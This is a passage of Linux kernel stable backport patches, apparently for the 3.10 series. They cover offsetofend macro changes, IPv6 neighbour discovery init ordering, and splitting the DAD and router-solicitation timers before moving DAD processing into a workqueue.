b/drivers/tty/vt/vt.c index 5deddca84a2..010ec70d59f 100644 --- a/drivers/tty/vt/vt.c +++ b/drivers/tty/vt/vt.c @@ -869,6 +869,9 @@ static int vc_do_resize(struct tty_struct *tty, struct vc_data *vc, if (!newscreen) return -ENOMEM; + if (vc == sel_cons) + clear_selection(); + old_rows = vc->vc_rows; old_row_size = vc->vc_size_row; From 6cc73a1c190edbf61f85588cc59a3e5bc972aaca Mon Sep 17 00:00:00 2001 From: Gavin Shan Date: Fri, 30 May 2014 11:35:54 -0600 Subject: [PATCH 218/315] drivers/vfio: Rework offsetofend() commit b13460b92093b29347e99d6c3242e350052b62cd upstream. The macro offsetofend() introduces unnecessary temporary variable "tmp". The patch avoids that and saves a bit memory in stack. Signed-off-by: Gavin Shan Signed-off-by: Alex Williamson [wt: backported only for ipv6 out-of-bounds fix] Signed-off-by: Willy Tarreau --- include/linux/vfio.h | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/include/linux/vfio.h b/include/linux/vfio.h index ac8d488e437..1a7f0acf891 100644 --- a/include/linux/vfio.h +++ b/include/linux/vfio.h @@ -86,8 +86,7 @@ extern void vfio_unregister_iommu_driver( * from user space. This allows us to easily determine if the provided * structure is sized to include various fields. */ -#define offsetofend(TYPE, MEMBER) ({ \ - TYPE tmp; \ - offsetof(TYPE, MEMBER) + sizeof(tmp.MEMBER); }) \ +#define offsetofend(TYPE, MEMBER) \ + (offsetof(TYPE, MEMBER) + sizeof(((TYPE *)0)->MEMBER)) #endif /* VFIO_H */ From 1ddb79447806c1d50b52e6e009833cd3f0ba0092 Mon Sep 17 00:00:00 2001 From: Denys Vlasenko Date: Mon, 9 Mar 2015 15:52:17 +0100 Subject: [PATCH 219/315] include/stddef.h: Move offsetofend() from vfio.h to a generic kernel header commit 3876488444e71238e287459c39d7692b6f718c3e upstream. Suggested by Andy. Suggested-by: Andy Lutomirski Signed-off-by: Denys Vlasenko Acked-by: Linus Torvalds Cc: Alexei Starovoitov Cc: Borislav Petkov Cc: Frederic Weisbecker Cc: H. Peter Anvin Cc: Kees Cook Cc: Oleg Nesterov Cc: Steven Rostedt Cc: Will Drewry Link: http://lkml.kernel.org/r/1425912738-559-1-git-send-email-dvlasenk@redhat.com Signed-off-by: Ingo Molnar [wt: backported only for ipv6 out-of-bounds fix] Signed-off-by: Willy Tarreau --- include/linux/stddef.h | 9 +++++++++ include/linux/vfio.h | 13 ------------- 2 files changed, 9 insertions(+), 13 deletions(-) diff --git a/include/linux/stddef.h b/include/linux/stddef.h index f4aec0e75c3..076af437284 100644 --- a/include/linux/stddef.h +++ b/include/linux/stddef.h @@ -19,3 +19,12 @@ enum { #define offsetof(TYPE, MEMBER) ((size_t) &((TYPE *)0)->MEMBER) #endif #endif + +/** + * offsetofend(TYPE, MEMBER) + * + * @TYPE: The type of the structure + * @MEMBER: The member within the structure to get the end offset of + */ +#define offsetofend(TYPE, MEMBER) \ + (offsetof(TYPE, MEMBER) + sizeof(((TYPE *)0)->MEMBER)) diff --git a/include/linux/vfio.h b/include/linux/vfio.h index 1a7f0acf891..ef4f73739a7 100644 --- a/include/linux/vfio.h +++ b/include/linux/vfio.h @@ -76,17 +76,4 @@ extern int vfio_register_iommu_driver(const struct vfio_iommu_driver_ops *ops); extern void vfio_unregister_iommu_driver( const struct vfio_iommu_driver_ops *ops); -/** - * offsetofend(TYPE, MEMBER) - * - * @TYPE: The type of the structure - * @MEMBER: The member within the structure to get the end offset of - * - * Simple helper macro for dealing with variable sized structures passed - * from user space. This allows us to easily determine if the provided - * structure is sized to include various fields. - */ -#define offsetofend(TYPE, MEMBER) \ - (offsetof(TYPE, MEMBER) + sizeof(((TYPE *)0)->MEMBER)) - #endif /* VFIO_H */ From 349759be02c3e69f6ea8b690450ae1b0b3b1b142 Mon Sep 17 00:00:00 2001 From: Joe Perches Date: Thu, 25 Jun 2015 15:01:16 -0700 Subject: [PATCH 220/315] stddef.h: move offsetofend inside #ifndef/#endif guard, neaten commit 8c7fbe5795a016259445a61e072eb0118aaf6a61 upstream. Commit 3876488444e7 ("include/stddef.h: Move offsetofend() from vfio.h to a generic kernel header") added offsetofend outside the normal include #ifndef/#endif guard. Move it inside. Miscellanea: o remove unnecessary blank line o standardize offsetof macros whitespace style Signed-off-by: Joe Perches Cc: Denys Vlasenko Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds [wt: backported only for ipv6 out-of-bounds fix] Signed-off-by: Willy Tarreau --- include/linux/stddef.h | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/include/linux/stddef.h b/include/linux/stddef.h index 076af437284..9c61c7cda93 100644 --- a/include/linux/stddef.h +++ b/include/linux/stddef.h @@ -3,7 +3,6 @@ #include - #undef NULL #define NULL ((void *)0) @@ -14,10 +13,9 @@ enum { #undef offsetof #ifdef __compiler_offsetof -#define offsetof(TYPE,MEMBER) __compiler_offsetof(TYPE,MEMBER) +#define offsetof(TYPE, MEMBER) __compiler_offsetof(TYPE, MEMBER) #else -#define offsetof(TYPE, MEMBER) ((size_t) &((TYPE *)0)->MEMBER) -#endif +#define offsetof(TYPE, MEMBER) ((size_t)&((TYPE *)0)->MEMBER) #endif /** @@ -28,3 +26,5 @@ enum { */ #define offsetofend(TYPE, MEMBER) \ (offsetof(TYPE, MEMBER) + sizeof(((TYPE *)0)->MEMBER)) + +#endif From af80b973dfd72d733212a1fe874c8252c7749632 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Michal=20Kube=C3=84=C2=8Dek?= Date: Fri, 16 Dec 2016 10:13:51 +0000 Subject: [PATCH 221/315] ipv6: don't call fib6_run_gc() until routing is ready commit 2c861cc65ef4604011a0082e4dcdba2819aa191a upstream. When loading the ipv6 module, ndisc_init() is called before ip6_route_init(). As the former registers a handler calling fib6_run_gc(), this opens a window to run the garbage collector before necessary data structures are initialized. If a network device is initialized in this window, adding MAC address to it triggers a NETDEV_CHANGEADDR event, leading to a crash in fib6_clean_all(). Take the event handler registration out of ndisc_init() into a separate function ndisc_late_init() and move it after ip6_route_init(). Signed-off-by: Michal Kubecek Signed-off-by: David S. Miller Cc: # 3.10.y Signed-off-by: Mike Manning Signed-off-by: Willy Tarreau --- include/net/ndisc.h | 2 ++ net/ipv6/af_inet6.c | 6 ++++++ net/ipv6/ndisc.c | 18 +++++++++++------- 3 files changed, 19 insertions(+), 7 deletions(-) diff --git a/include/net/ndisc.h b/include/net/ndisc.h index 5043f8b0805..4b12d99a13c 100644 --- a/include/net/ndisc.h +++ b/include/net/ndisc.h @@ -190,7 +190,9 @@ static inline struct neighbour *__ipv6_neigh_lookup(struct net_device *dev, cons } extern int ndisc_init(void); +extern int ndisc_late_init(void); +extern void ndisc_late_cleanup(void); extern void ndisc_cleanup(void); extern int ndisc_rcv(struct sk_buff *skb); diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c index a944f1313c5..9443af7d7ec 100644 --- a/net/ipv6/af_inet6.c +++ b/net/ipv6/af_inet6.c @@ -900,6 +900,9 @@ static int __init inet6_init(void) err = ip6_route_init(); if (err) goto ip6_route_fail; + err = ndisc_late_init(); + if (err) + goto ndisc_late_fail; err = ip6_flowlabel_init(); if (err) goto ip6_flowlabel_fail; @@ -960,6 +963,8 @@ ipv6_exthdrs_fail: addrconf_fail: ip6_flowlabel_cleanup(); ip6_flowlabel_fail: + ndisc_late_cleanup(); +ndisc_late_fail: ip6_route_cleanup(); ip6_route_fail: #ifdef CONFIG_PROC_FS @@ -1020,6 +1025,7 @@ static void __exit inet6_exit(void) ipv6_exthdrs_exit(); addrconf_cleanup(); ip6_flowlabel_cleanup(); + ndisc_late_cleanup(); ip6_route_cleanup(); #ifdef CONFIG_PROC_FS diff --git a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c index deedf7ddbc6..de10ccfe7f7 100644 --- a/net/ipv6/ndisc.c +++ b/net/ipv6/ndisc.c @@ -1716,24 +1716,28 @@ int __init ndisc_init(void) if (err) goto out_unregister_pernet; #endif - err = register_netdevice_notifier(&ndisc_netdev_notifier); - if (err) - goto out_unregister_sysctl; out: return err; -out_unregister_sysctl: #ifdef CONFIG_SYSCTL - neigh_sysctl_unregister(&nd_tbl.parms); out_unregister_pernet: -#endif unregister_pernet_subsys(&ndisc_net_ops); goto out; +#endif +} + +int __init ndisc_late_init(void) +{ + return register_netdevice_notifier(&ndisc_netdev_notifier); +} + +void ndisc_late_cleanup(void) +{ + unregister_netdevice_notifier(&ndisc_netdev_notifier); } void ndisc_cleanup(void) { - unregister_netdevice_notifier(&ndisc_netdev_notifier); #ifdef CONFIG_SYSCTL neigh_sysctl_unregister(&nd_tbl.parms); #endif From 973d5956f754cfc306f5e274d71503498f4b0324 Mon Sep 17 00:00:00 2001 From: Hannes Frederic Sowa Date: Fri, 16 Dec 2016 10:15:37 +0000 Subject: [PATCH 222/315] ipv6: split duplicate address detection and router solicitation timer commit b7b1bfce0bb68bd8f6e62a28295922785cc63781 upstream. This patch splits the timers for duplicate address detection and router solicitations apart. The router solicitations timer goes into inet6_dev and the dad timer stays in inet6_ifaddr. The reason behind this patch is to reduce the number of unneeded router solicitations send out by the host if additional link-local addresses are created. Currently we send out RS for every link-local address on an interface. If the RS timer fires we pick a source address with ipv6_get_lladdr. This change could hurt people adding additional link-local addresses and specifying these addresses in the radvd clients section because we no longer guarantee that we use every ll address as source address in router solicitations. Cc: Flavio Leitner Cc: Hideaki YOSHIFUJI Cc: David Stevens Signed-off-by: Hannes Frederic Sowa Reviewed-by: Flavio Leitner Signed-off-by: David S. Miller Cc: # 3.10.y [Mike Manning : resolved conflicts with 36bddb] Signed-off-by: Mike Manning Signed-off-by: Willy Tarreau --- include/net/if_inet6.h | 8 ++- net/ipv6/addrconf.c | 138 ++++++++++++++++++++++------------------- 2 files changed, 80 insertions(+), 66 deletions(-) diff --git a/include/net/if_inet6.h b/include/net/if_inet6.h index 100fb8cec17..3b558c699df 100644 --- a/include/net/if_inet6.h +++ b/include/net/if_inet6.h @@ -50,7 +50,7 @@ struct inet6_ifaddr { int state; - __u8 probes; + __u8 dad_probes; __u8 flags; __u16 scope; @@ -58,7 +58,7 @@ struct inet6_ifaddr { unsigned long cstamp; /* created timestamp */ unsigned long tstamp; /* updated timestamp */ - struct timer_list timer; + struct timer_list dad_timer; struct inet6_dev *idev; struct rt6_info *rt; @@ -195,6 +195,10 @@ struct inet6_dev { struct inet6_dev *next; struct ipv6_devconf cnf; struct ipv6_devstat stats; + + struct timer_list rs_timer; + __u8 rs_probes; + unsigned long tstamp; /* ipv6InterfaceTable update timestamp */ struct rcu_head rcu; }; diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c index d0912acd952..4ff6a9cd3a4 100644 --- a/net/ipv6/addrconf.c +++ b/net/ipv6/addrconf.c @@ -253,37 +253,32 @@ static inline bool addrconf_qdisc_ok(const struct net_device *dev) return !qdisc_tx_is_noop(dev); } -static void addrconf_del_timer(struct inet6_ifaddr *ifp) +static void addrconf_del_rs_timer(struct inet6_dev *idev) { - if (del_timer(&ifp->timer)) + if (del_timer(&idev->rs_timer)) + __in6_dev_put(idev); +} + +static void addrconf_del_dad_timer(struct inet6_ifaddr *ifp) +{ + if (del_timer(&ifp->dad_timer)) __in6_ifa_put(ifp); } -enum addrconf_timer_t { - AC_NONE, - AC_DAD, - AC_RS, -}; - -static void addrconf_mod_timer(struct inet6_ifaddr *ifp, - enum addrconf_timer_t what, - unsigned long when) +static void addrconf_mod_rs_timer(struct inet6_dev *idev, + unsigned long when) { - if (!del_timer(&ifp->timer)) - in6_ifa_hold(ifp); + if (!timer_pending(&idev->rs_timer)) + in6_dev_hold(idev); + mod_timer(&idev->rs_timer, jiffies + when); +} - switch (what) { - case AC_DAD: - ifp->timer.function = addrconf_dad_timer; - break; - case AC_RS: - ifp->timer.function = addrconf_rs_timer; - break; - default: - break; - } - ifp->timer.expires = jiffies + when; - add_timer(&ifp->timer); +static void addrconf_mod_dad_timer(struct inet6_ifaddr *ifp, + unsigned long when) +{ + if (!timer_pending(&ifp->dad_timer)) + in6_ifa_hold(ifp); + mod_timer(&ifp->dad_timer, jiffies + when); } static int snmp6_alloc_dev(struct inet6_dev *idev) @@ -326,6 +321,7 @@ void in6_dev_finish_destroy(struct inet6_dev *idev) WARN_ON(!list_empty(&idev->addr_list)); WARN_ON(idev->mc_list != NULL); + WARN_ON(timer_pending(&idev->rs_timer)); #ifdef NET_REFCNT_DEBUG pr_debug("%s: %s\n", __func__, dev ? dev->name : "NIL"); @@ -357,7 +353,8 @@ static struct inet6_dev *ipv6_add_dev(struct net_device *dev) rwlock_init(&ndev->lock); ndev->dev = dev; INIT_LIST_HEAD(&ndev->addr_list); - + setup_timer(&ndev->rs_timer, addrconf_rs_timer, + (unsigned long)ndev); memcpy(&ndev->cnf, dev_net(dev)->ipv6.devconf_dflt, sizeof(ndev->cnf)); ndev->cnf.mtu6 = dev->mtu; ndev->cnf.sysctl = NULL; @@ -776,7 +773,7 @@ void inet6_ifa_finish_destroy(struct inet6_ifaddr *ifp) in6_dev_put(ifp->idev); - if (del_timer(&ifp->timer)) + if (del_timer(&ifp->dad_timer)) pr_notice("Timer is still running, when freeing ifa=%p\n", ifp); if (ifp->state != INET6_IFADDR_STATE_DEAD) { @@ -869,9 +866,9 @@ ipv6_add_addr(struct inet6_dev *idev, const struct in6_addr *addr, int pfxlen, spin_lock_init(&ifa->lock); spin_lock_init(&ifa->state_lock); - init_timer(&ifa->timer); + setup_timer(&ifa->dad_timer, addrconf_dad_timer, + (unsigned long)ifa); INIT_HLIST_NODE(&ifa->addr_lst); - ifa->timer.data = (unsigned long) ifa; ifa->scope = scope; ifa->prefix_len = pfxlen; ifa->flags = flags | IFA_F_TENTATIVE; @@ -994,7 +991,7 @@ static void ipv6_del_addr(struct inet6_ifaddr *ifp) } write_unlock_bh(&idev->lock); - addrconf_del_timer(ifp); + addrconf_del_dad_timer(ifp); ipv6_ifa_notify(RTM_DELADDR, ifp); @@ -1617,7 +1614,7 @@ static void addrconf_dad_stop(struct inet6_ifaddr *ifp, int dad_failed) { if (ifp->flags&IFA_F_PERMANENT) { spin_lock_bh(&ifp->lock); - addrconf_del_timer(ifp); + addrconf_del_dad_timer(ifp); ifp->flags |= IFA_F_TENTATIVE; if (dad_failed) ifp->flags |= IFA_F_DADFAILED; @@ -3085,7 +3082,7 @@ static int addrconf_ifdown(struct net_device *dev, int how) hlist_for_each_entry_rcu(ifa, h, addr_lst) { if (ifa->idev == idev) { hlist_del_init_rcu(&ifa->addr_lst); - addrconf_del_timer(ifa); + addrconf_del_dad_timer(ifa); goto restart; } } @@ -3094,6 +3091,8 @@ static int addrconf_ifdown(struct net_device *dev, int how) write_lock_bh(&idev->lock); + addrconf_del_rs_timer(idev); + /* Step 2: clear flags for stateless addrconf */ if (!how) idev->if_flags &= ~(IF_RS_SENT|IF_RA_RCVD|IF_READY); @@ -3123,7 +3122,7 @@ static int addrconf_ifdown(struct net_device *dev, int how) while (!list_empty(&idev->addr_list)) { ifa = list_first_entry(&idev->addr_list, struct inet6_ifaddr, if_list); - addrconf_del_timer(ifa); + addrconf_del_dad_timer(ifa); list_del(&ifa->if_list); @@ -3165,10 +3164,10 @@ static int addrconf_ifdown(struct net_device *dev, int how) static void addrconf_rs_timer(unsigned long data) { - struct inet6_ifaddr *ifp = (struct inet6_ifaddr *) data; - struct inet6_dev *idev = ifp->idev; + struct inet6_dev *idev = (struct inet6_dev *)data; + struct in6_addr lladdr; - read_lock(&idev->lock); + write_lock(&idev->lock); if (idev->dead || !(idev->if_flags & IF_READY)) goto out; @@ -3179,18 +3178,19 @@ static void addrconf_rs_timer(unsigned long data) if (idev->if_flags & IF_RA_RCVD) goto out; - spin_lock(&ifp->lock); - if (ifp->probes++ < idev->cnf.rtr_solicits) { - /* The wait after the last probe can be shorter */ - addrconf_mod_timer(ifp, AC_RS, - (ifp->probes == idev->cnf.rtr_solicits) ? - idev->cnf.rtr_solicit_delay : - idev->cnf.rtr_solicit_interval); - spin_unlock(&ifp->lock); + if (idev->rs_probes++ < idev->cnf.rtr_solicits) { + if (!__ipv6_get_lladdr(idev, &lladdr, IFA_F_TENTATIVE)) + ndisc_send_rs(idev->dev, &lladdr, + &in6addr_linklocal_allrouters); + else + goto out; - ndisc_send_rs(idev->dev, &ifp->addr, &in6addr_linklocal_allrouters); + /* The wait after the last probe can be shorter */ + addrconf_mod_rs_timer(idev, (idev->rs_probes == + idev->cnf.rtr_solicits) ? + idev->cnf.rtr_solicit_delay : + idev->cnf.rtr_solicit_interval); } else { - spin_unlock(&ifp->lock); /* * Note: we do not support deprecated "all on-link" * assumption any longer. @@ -3199,8 +3199,8 @@ static void addrconf_rs_timer(unsigned long data) } out: - read_unlock(&idev->lock); - in6_ifa_put(ifp); + write_unlock(&idev->lock); + in6_dev_put(idev); } /* @@ -3216,8 +3216,8 @@ static void addrconf_dad_kick(struct inet6_ifaddr *ifp) else rand_num = net_random() % (idev->cnf.rtr_solicit_delay ? : 1); - ifp->probes = idev->cnf.dad_transmits; - addrconf_mod_timer(ifp, AC_DAD, rand_num); + ifp->dad_probes = idev->cnf.dad_transmits; + addrconf_mod_dad_timer(ifp, rand_num); } static void addrconf_dad_start(struct inet6_ifaddr *ifp) @@ -3278,40 +3278,40 @@ static void addrconf_dad_timer(unsigned long data) struct inet6_dev *idev = ifp->idev; struct in6_addr mcaddr; - if (!ifp->probes && addrconf_dad_end(ifp)) + if (!ifp->dad_probes && addrconf_dad_end(ifp)) goto out; - read_lock(&idev->lock); + write_lock(&idev->lock); if (idev->dead || !(idev->if_flags & IF_READY)) { - read_unlock(&idev->lock); + write_unlock(&idev->lock); goto out; } spin_lock(&ifp->lock); if (ifp->state == INET6_IFADDR_STATE_DEAD) { spin_unlock(&ifp->lock); - read_unlock(&idev->lock); + write_unlock(&idev->lock); goto out; } - if (ifp->probes == 0) { + if (ifp->dad_probes == 0) { /* * DAD was successful */ ifp->flags &= ~(IFA_F_TENTATIVE|IFA_F_OPTIMISTIC|IFA_F_DADFAILED); spin_unlock(&ifp->lock); - read_unlock(&idev->lock); + write_unlock(&idev->lock); addrconf_dad_completed(ifp); goto out; } - ifp->probes--; - addrconf_mod_timer(ifp, AC_DAD, ifp->idev->nd_parms->retrans_time); + ifp->dad_probes--; + addrconf_mod_dad_timer(ifp, ifp->idev->nd_parms->retrans_time); spin_unlock(&ifp->lock); - read_unlock(&idev->lock); + write_unlock(&idev->lock); /* send a neighbour solicitation for our addr */ addrconf_addr_solict_mult(&ifp->addr, &mcaddr); @@ -3323,6 +3323,9 @@ out: static void addrconf_dad_completed(struct inet6_ifaddr *ifp) { struct net_device *dev = ifp->idev->dev; + struct in6_addr lladdr; + + addrconf_del_dad_timer(ifp); /* * Configure the address for reception. Now it is valid. @@ -3343,13 +3346,20 @@ static void addrconf_dad_completed(struct inet6_ifaddr *ifp) * [...] as part of DAD [...] there is no need * to delay again before sending the first RS */ - ndisc_send_rs(ifp->idev->dev, &ifp->addr, &in6addr_linklocal_allrouters); + if (!ipv6_get_lladdr(dev, &lladdr, IFA_F_TENTATIVE)) + ndisc_send_rs(dev, &lladdr, + &in6addr_linklocal_allrouters); + else + return; - spin_lock_bh(&ifp->lock); - ifp->probes = 1; + write_lock_bh(&ifp->idev->lock); + spin_lock(&ifp->lock); + ifp->idev->rs_probes = 1; ifp->idev->if_flags |= IF_RS_SENT; - addrconf_mod_timer(ifp, AC_RS, ifp->idev->cnf.rtr_solicit_interval); - spin_unlock_bh(&ifp->lock); + addrconf_mod_rs_timer(ifp->idev, + ifp->idev->cnf.rtr_solicit_interval); + spin_unlock(&ifp->lock); + write_unlock_bh(&ifp->idev->lock); } } From 835b474b8f70fa68d68abffad37378e92f661802 Mon Sep 17 00:00:00 2001 From: Hannes Frederic Sowa Date: Fri, 16 Dec 2016 10:16:12 +0000 Subject: [PATCH 223/315] ipv6: move DAD and addrconf_verify processing to workqueue commit c15b1ccadb323ea50023e8f1cca2954129a62b51 upstream. addrconf_join_solict and addrconf_join_anycast may cause actions which need rtnl locked, especially on first address creation. A new DAD state is introduced which defers processing of the initial DAD processing into a workqueue. To get rtnl lock we need to push the code paths which depend on those calls up to workqueues, specifically addrconf_verify and the DAD processing. (v2) addrconf_dad_failure needs to be queued up to the workqueue, too. This patch introduces a new DAD state and stop the DAD processing in the workqueue (this is because of the possible ipv6_del_addr processing which removes the solicited multicast address from the device). addrconf_verify_lock is removed, too. After the transition it is not needed any more. As we are not processing in bottom half anymore we need to be a bit more careful about disabling bottom half out when we lock spin_locks which are also used in bh. Relevant backtrace: [ 541.030090] RTNL: assertion failed at net/core/dev.c (4496) [ 541.031143] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G O 3.10.33-1-amd64-vyatta #1 [ 541.031145] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2007 [ 541.031146] ffffffff8148a9f0 000000000000002f ffffffff813c98c1 ffff88007c4451f8 [ 541.031148] 0000000000000000 0000000000000000 ffffffff813d3540 ffff88007fc03d18 [ 541.031150] 0000880000000006 ffff88007c445000 ffffffffa0194160 0000000000000000 [ 541.031152] Call Trace: [ 541.031153] [] ? dump_stack+0xd/0x17 [ 541.031180] [] ? __dev_set_promiscuity+0x101/0x180 [ 541.031183] [] ? __hw_addr_create_ex+0x60/0xc0 [ 541.031185] [] ? __dev_set_rx_mode+0xaa/0xc0 [ 541.031189] [] ? __dev_mc_add+0x61/0x90 [ 541.031198] [] ? igmp6_group_added+0xfc/0x1a0 [ipv6] [ 541.031208] [] ? kmem_cache_alloc+0xcb/0xd0 [ 541.031212] [] ? ipv6_dev_mc_inc+0x267/0x300 [ipv6] [ 541.031216] [] ? addrconf_join_solict+0x2e/0x40 [ipv6] [ 541.031219] [] ? ipv6_dev_ac_inc+0x159/0x1f0 [ipv6] [ 541.031223] [] ? addrconf_join_anycast+0x92/0xa0 [ipv6] [ 541.031226] [] ? __ipv6_ifa_notify+0x11e/0x1e0 [ipv6] [ 541.031229] [] ? ipv6_ifa_notify+0x33/0x50 [ipv6] [ 541.031233] [] ? addrconf_dad_completed+0x28/0x100 [ipv6] [ 541.031241] [] ? task_cputime+0x2d/0x50 [ 541.031244] [] ? addrconf_dad_timer+0x136/0x150 [ipv6] [ 541.031247] [] ? addrconf_dad_completed+0x100/0x100 [ipv6] [ 541.031255] [] ? call_timer_fn.isra.22+0x2a/0x90 [ 541.031258] [] ? addrconf_dad_completed+0x100/0x100 [ipv6] Hunks and backtrace stolen from a patch by Stephen Hemminger. Reported-by: Stephen Hemminger Signed-off-by: Stephen Hemminger Signed-off-by: Hannes Frederic Sowa Signed-off-by: David S. Miller Cc: # 3.10.y: b7b1bfce: ipv6: split dad and rs timers Cc: # 3.10.y [Mike Manning : resolved minor conflicts in addrconf.c] Signed-off-by: Mike Manning Signed-off-by: Willy Tarreau --- include/net/if_inet6.h | 4 +- net/ipv6/addrconf.c | 186 ++++++++++++++++++++++++++++++----------- 2 files changed, 141 insertions(+), 49 deletions(-) diff --git a/include/net/if_inet6.h b/include/net/if_inet6.h index 3b558c699df..a49b6502916 100644 --- a/include/net/if_inet6.h +++ b/include/net/if_inet6.h @@ -31,8 +31,10 @@ #define IF_PREFIX_AUTOCONF 0x02 enum { + INET6_IFADDR_STATE_PREDAD, INET6_IFADDR_STATE_DAD, INET6_IFADDR_STATE_POSTDAD, + INET6_IFADDR_STATE_ERRDAD, INET6_IFADDR_STATE_UP, INET6_IFADDR_STATE_DEAD, }; @@ -58,7 +60,7 @@ struct inet6_ifaddr { unsigned long cstamp; /* created timestamp */ unsigned long tstamp; /* updated timestamp */ - struct timer_list dad_timer; + struct delayed_work dad_work; struct inet6_dev *idev; struct rt6_info *rt; diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c index 4ff6a9cd3a4..98dd353a873 100644 --- a/net/ipv6/addrconf.c +++ b/net/ipv6/addrconf.c @@ -139,10 +139,12 @@ static int ipv6_count_addresses(struct inet6_dev *idev); static struct hlist_head inet6_addr_lst[IN6_ADDR_HSIZE]; static DEFINE_SPINLOCK(addrconf_hash_lock); -static void addrconf_verify(unsigned long); +static void addrconf_verify(void); +static void addrconf_verify_rtnl(void); +static void addrconf_verify_work(struct work_struct *); -static DEFINE_TIMER(addr_chk_timer, addrconf_verify, 0, 0); -static DEFINE_SPINLOCK(addrconf_verify_lock); +static struct workqueue_struct *addrconf_wq; +static DECLARE_DELAYED_WORK(addr_chk_work, addrconf_verify_work); static void addrconf_join_anycast(struct inet6_ifaddr *ifp); static void addrconf_leave_anycast(struct inet6_ifaddr *ifp); @@ -157,7 +159,7 @@ static struct rt6_info *addrconf_get_prefix_route(const struct in6_addr *pfx, u32 flags, u32 noflags); static void addrconf_dad_start(struct inet6_ifaddr *ifp); -static void addrconf_dad_timer(unsigned long data); +static void addrconf_dad_work(struct work_struct *w); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_dad_run(struct inet6_dev *idev); static void addrconf_rs_timer(unsigned long data); @@ -259,9 +261,9 @@ static void addrconf_del_rs_timer(struct inet6_dev *idev) __in6_dev_put(idev); } -static void addrconf_del_dad_timer(struct inet6_ifaddr *ifp) +static void addrconf_del_dad_work(struct inet6_ifaddr *ifp) { - if (del_timer(&ifp->dad_timer)) + if (cancel_delayed_work(&ifp->dad_work)) __in6_ifa_put(ifp); } @@ -273,12 +275,12 @@ static void addrconf_mod_rs_timer(struct inet6_dev *idev, mod_timer(&idev->rs_timer, jiffies + when); } -static void addrconf_mod_dad_timer(struct inet6_ifaddr *ifp, - unsigned long when) +static void addrconf_mod_dad_work(struct inet6_ifaddr *ifp, + unsigned long delay) { - if (!timer_pending(&ifp->dad_timer)) + if (!delayed_work_pending(&ifp->dad_work)) in6_ifa_hold(ifp); - mod_timer(&ifp->dad_timer, jiffies + when); + mod_delayed_work(addrconf_wq, &ifp->dad_work, delay); } static int snmp6_alloc_dev(struct inet6_dev *idev) @@ -773,8 +775,9 @@ void inet6_ifa_finish_destroy(struct inet6_ifaddr *ifp) in6_dev_put(ifp->idev); - if (del_timer(&ifp->dad_timer)) - pr_notice("Timer is still running, when freeing ifa=%p\n", ifp); + if (cancel_delayed_work(&ifp->dad_work)) + pr_notice("delayed DAD work was pending while freeing ifa=%p\n", + ifp); if (ifp->state != INET6_IFADDR_STATE_DEAD) { pr_warn("Freeing alive inet6 address %p\n", ifp); @@ -866,8 +869,7 @@ ipv6_add_addr(struct inet6_dev *idev, const struct in6_addr *addr, int pfxlen, spin_lock_init(&ifa->lock); spin_lock_init(&ifa->state_lock); - setup_timer(&ifa->dad_timer, addrconf_dad_timer, - (unsigned long)ifa); + INIT_DELAYED_WORK(&ifa->dad_work, addrconf_dad_work); INIT_HLIST_NODE(&ifa->addr_lst); ifa->scope = scope; ifa->prefix_len = pfxlen; @@ -927,6 +929,8 @@ static void ipv6_del_addr(struct inet6_ifaddr *ifp) int deleted = 0, onlink = 0; unsigned long expires = jiffies; + ASSERT_RTNL(); + spin_lock_bh(&ifp->state_lock); state = ifp->state; ifp->state = INET6_IFADDR_STATE_DEAD; @@ -991,7 +995,7 @@ static void ipv6_del_addr(struct inet6_ifaddr *ifp) } write_unlock_bh(&idev->lock); - addrconf_del_dad_timer(ifp); + addrconf_del_dad_work(ifp); ipv6_ifa_notify(RTM_DELADDR, ifp); @@ -1614,7 +1618,7 @@ static void addrconf_dad_stop(struct inet6_ifaddr *ifp, int dad_failed) { if (ifp->flags&IFA_F_PERMANENT) { spin_lock_bh(&ifp->lock); - addrconf_del_dad_timer(ifp); + addrconf_del_dad_work(ifp); ifp->flags |= IFA_F_TENTATIVE; if (dad_failed) ifp->flags |= IFA_F_DADFAILED; @@ -1637,20 +1641,21 @@ static void addrconf_dad_stop(struct inet6_ifaddr *ifp, int dad_failed) } ipv6_del_addr(ifp); #endif - } else + } else { ipv6_del_addr(ifp); + } } static int addrconf_dad_end(struct inet6_ifaddr *ifp) { int err = -ENOENT; - spin_lock(&ifp->state_lock); + spin_lock_bh(&ifp->state_lock); if (ifp->state == INET6_IFADDR_STATE_DAD) { ifp->state = INET6_IFADDR_STATE_POSTDAD; err = 0; } - spin_unlock(&ifp->state_lock); + spin_unlock_bh(&ifp->state_lock); return err; } @@ -1683,7 +1688,12 @@ void addrconf_dad_failure(struct inet6_ifaddr *ifp) } } - addrconf_dad_stop(ifp, 1); + spin_lock_bh(&ifp->state_lock); + /* transition from _POSTDAD to _ERRDAD */ + ifp->state = INET6_IFADDR_STATE_ERRDAD; + spin_unlock_bh(&ifp->state_lock); + + addrconf_mod_dad_work(ifp, 0); } /* Join to solicited addr multicast group. */ @@ -1692,6 +1702,8 @@ void addrconf_join_solict(struct net_device *dev, const struct in6_addr *addr) { struct in6_addr maddr; + ASSERT_RTNL(); + if (dev->flags&(IFF_LOOPBACK|IFF_NOARP)) return; @@ -1703,6 +1715,8 @@ void addrconf_leave_solict(struct inet6_dev *idev, const struct in6_addr *addr) { struct in6_addr maddr; + ASSERT_RTNL(); + if (idev->dev->flags&(IFF_LOOPBACK|IFF_NOARP)) return; @@ -1713,6 +1727,9 @@ void addrconf_leave_solict(struct inet6_dev *idev, const struct in6_addr *addr) static void addrconf_join_anycast(struct inet6_ifaddr *ifp) { struct in6_addr addr; + + ASSERT_RTNL(); + if (ifp->prefix_len == 127) /* RFC 6164 */ return; ipv6_addr_prefix(&addr, &ifp->addr, ifp->prefix_len); @@ -1724,6 +1741,9 @@ static void addrconf_join_anycast(struct inet6_ifaddr *ifp) static void addrconf_leave_anycast(struct inet6_ifaddr *ifp) { struct in6_addr addr; + + ASSERT_RTNL(); + if (ifp->prefix_len == 127) /* RFC 6164 